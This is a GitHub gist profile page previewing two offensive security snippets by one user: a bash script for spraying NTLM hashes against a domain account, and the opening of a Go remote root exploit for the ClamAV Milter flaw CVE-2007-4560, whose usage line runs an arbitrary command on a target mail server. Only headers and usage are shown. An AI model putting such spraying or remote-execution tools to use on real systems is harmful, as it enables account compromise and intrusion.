Skip to content

Instantly share code, notes, and snippets.

View 0xjbb's full-sized avatar

Josh 0xjbb

  • /dev/null
  • Norfolk, UK
View GitHub Profile
@0xjbb
0xjbb / tgtspray.sh
Last active December 25, 2020 01:09
TGTSpray. A tool to spray hashes when smb/winrm lock you out :(
#!/usr/bin/bash
# made by 0xjb, definitely not made for any ctf boxes
# Hash spraying when crackmapexec locks you out :(
# Is it good? no
# Did it work for me in a time of need? yes.
# Will it work for you? ¯\_(ツ)_/¯
if [ "$#" -ne 2 ];then
echo "Usage: $0 <DOMAIN/User> <File of NTLM hashes 'hash:hash'>"
@0xjbb
0xjbb / CVE-2007-4560.go
Last active March 10, 2021 20:09
[GO] ClamAV Milter Remote Code Execution [CVE-2007-4560]
package main
// Sendmail w/ clamav-milter Remote Root Exploit
// 'CVE-2007-4560'
// coded by https://github.com/0xjbb :)
// go run exploit.go -h 192.168.109.42 -p 25 -c "ping -c 5 192.168.49.109"
import (
"flag"
"log"
"net"
)